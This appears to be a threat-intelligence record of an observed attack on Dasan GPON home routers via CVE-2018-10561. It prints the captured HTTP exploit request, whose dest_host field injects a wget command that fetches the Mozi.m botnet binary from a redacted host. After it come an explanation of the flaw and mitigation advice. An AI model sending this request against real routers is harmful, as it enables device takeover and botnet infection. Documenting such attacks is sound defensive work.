CVE-2018-10561

2025-12-23

103.199.202.161

india 

Dasan 

GPON home routers 

POST /GponForm/diag_Form?images%2F HTTP/1.0
User-Agent: Hello, World
Host: █████████
Content-Type: application/octet-stream
Content-Length: 118
X-Forwarded-For: ███████████████
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://███████████████:55257/Mozi.m+-O+->/tmp/gpon8

CVE-2018-10561 is a significant security vulnerability affecting Dasan GPON home routers, which are widely used for providing fiber-optic internet. The vulnerability allows remote attackers to bypass the router's authentication mechanism by simply appending the string "?images" to any URL within the device's web interface. This bypass grants attackers full management access to the device without requiring any credentials. 
The vulnerability is particularly critical as it affects over one million routers globally, making it a prime target for cybercriminals. Once an attacker gains access, they can manipulate the router's settings, redirect users to malicious websites, install malware, and even eavesdrop on network traffic. The compromised routers can also be used as part of a botnet for launching distributed denial-of-service (DDoS) attacks, similar to the infamous Mirai or Satori botnets.
The issue is compounded when combined with another vulnerability, CVE-2018-10562, which allows for command injection. Together, these vulnerabilities enable unauthenticated attackers to take complete control of the device and potentially the entire network. The routers save ping results in a temporary file and transmit them to the user upon revisiting a specific URL, making it easy for attackers to execute commands and retrieve their output.
Given the widespread use of these routers and the potential for severe security and privacy breaches, CVE-2018-10561 has been included in CISA's Known Exploited Vulnerabilities Catalog. The vulnerability poses a high risk to users, especially since the affected devices are often end-of-life and may not receive security updates.

Disconnect Affected Devices: Since the impacted routers are end-of-life, it is recommended to disconnect them from the network to prevent unauthorized access.
Replace with Secure Alternatives: Consider replacing the vulnerable routers with newer models that receive regular security updates and patches.
Network Monitoring: Implement network monitoring to detect any unusual activities that may indicate exploitation attempts.
Firewall and Access Controls: Use firewalls and strict access controls to limit exposure to the internet and prevent unauthorized access.
Educate Users: Inform users about the risks associated with using outdated and vulnerable devices, and encourage them to upgrade to more secure options.